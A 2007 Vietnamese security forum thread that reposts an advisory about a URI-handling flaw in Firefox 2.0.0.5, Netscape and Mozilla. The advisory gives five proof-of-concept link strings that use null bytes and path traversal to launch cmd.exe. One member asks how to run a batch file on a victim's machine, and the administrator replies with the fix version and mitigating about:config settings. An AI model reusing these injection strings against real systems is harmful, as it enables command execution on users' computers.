banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Forum Index Thông tin new bugs và exploits Remote Command Exec (FireFox 2.0.0.5 et al)  XML
  [Announcement]   Remote Command Exec (FireFox 2.0.0.5 et al) 29/07/2007 14:11:49 (+0700) | #1 | 74809
114v
Member

[Minus]    0    [Plus]
Joined: 08/07/2006 23:27:00
Messages: 191
Offline
[Profile] [PM]
By: Nate McFeters (nate dot mcfeters -at- gmail)
Billy (BK) Rios (billy dot rios -at- gmail)

Tested in FireFox 2.0.0.5 (and 3.0a6), Netscape Navigator 9, and Mozilla browser.

****NOTE**** These examples were created for WinXP SP2 with no external mail programs installed (outlook, notes…etc). If you have an external mail program installed, these examples may not work on your machine (as the URI handling may have changed).



Once again, a flaw in the URI handling behavior allows for remote command execution. UNREGISTER ALL UNNECESSARY URIs NOW! This example shows flaws in Firefox, Netscape, and Mozilla browsers… other browsers are affected by related vulnerabilities.



Developers who intend to (or have already) registered URIs for their applications MUST UNDERSTAND that registering a URI handler exponentially increases the attack surface for that application. Please review your registered URI handling mechanisms and audit the functionality called by those URIs…



These can be launched with no user warning (simply click on the link):
Code:
mailto:%00%00../../../../../../windows/system32/cmd".exe ../../../../../../../../windows/system32/calc.exe " - " blah.bat

nntp:%00%00../../../../../../windows/system32/cmd".exe ../../../../../../../../windows/system32/calc.exe " - " blah.bat

news:%00%00../../../../../../windows/system32/cmd".exe ../../../../../../../../windows/system32/calc.exe " - " blah.bat

snews:%00%00../../../../../../windows/system32/cmd".exe ../../../../../../../../windows/system32/calc.exe " - " blah.bat

telnet:%00%00../../../../../../windows/system32/cmd".exe ../../../../../../../../windows/system32/calc.exe " - " blah.bat
[Up] [Print Copy]
  [Question]   Remote Command Exec (FireFox 2.0.0.5 et al) 30/07/2007 06:17:17 (+0700) | #2 | 74939
L0ng3ta
Locked

[Minus]    0    [Plus]
Joined: 17/09/2002 13:47:43
Messages: 264
Location: Địa cầu
Offline
[Profile] [PM]
Lỗi thú vị đây ... khi nhấn vào cái link nào phải cẩn thận mới được smilie) smilie) smilie)
[Up] [Print Copy]
  [Question]   Remote Command Exec (FireFox 2.0.0.5 et al) 30/07/2007 06:52:14 (+0700) | #3 | 74944
[Avatar]
minhquan1712
Member

[Minus]    0    [Plus]
Joined: 07/09/2006 16:17:25
Messages: 240
Offline
[Profile] [PM]
These examples were created for WinXP SP2 with no external mail programs installed (outlook, notes…etc). If you have an external mail program installed, these examples may not work on your machine (as the URI handling may have changed).
 

có fải ý nó nói là cái này ko hoạt động trên winSP2 có cài outlook,note pad ko nhỉ? ^^. Sẵn cho em hỏi làm sao mình có thể chạy được file blah.bat đó trên máy victim được nhỉ?Nếu biết được cách thì nó nguy hiểm thiệt ^^
[Up] [Print Copy]
  [Question]   Re: Remote Command Exec (FireFox 2.0.0.5 et al) 01/08/2007 18:43:22 (+0700) | #4 | 75679
[Avatar]
conmale
Administrator

Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline
[Profile] [PM]
Lỗi này đã được fixed ở phiên bản 2.0.0.6

Nếu ai còn dùng 2.0.0.5 hoặc cũ hơn, gõ about:config trên thanh địa chỉ và tìm từ khóa warn-external rồi đổi hết giá trị thành true. Có 5 giá trị để xem và đổi:

Code:
network.protocol-handler.warn-external-default
network.protocol-handler.warn-external.mailto
network.protocol-handler.warn-external.news
network.protocol-handler.warn-external.nntp
network.protocol-handler.warn-external.snews
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]
  [Question]   Remote Command Exec (FireFox 2.0.0.5 et al) 04/08/2007 10:02:56 (+0700) | #5 | 76652
[Avatar]
lamhoang20002000
Member

[Minus]    0    [Plus]
Joined: 03/04/2005 16:32:02
Messages: 52
Offline
[Profile] [PM] [Yahoo!]
Anh Comale ơi, để test bug này, có phải tạo một link <a href=(")mailto:%00%00../../../../../../windows/system32/cmd".exe ../../../../../../../../windows/system32/calc.exe " - " blah.bat(")</a>. ----> Open with Firefox and click the link? Mong anh chỉ dùm. Mà file blah.bat ấy là do mình tạo ra hay là cái gì vậy???
[Up] [Print Copy]
  [Question]   Re: Remote Command Exec (FireFox 2.0.0.5 et al) 04/08/2007 11:58:51 (+0700) | #6 | 76697
smile_sad
Member

[Minus]    0    [Plus]
Joined: 15/08/2006 19:15:08
Messages: 96
Offline
[Profile] [PM]
hi hi của em tìm ko ra mấy cái đó ...may quá trời ơi :lolsmilie
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|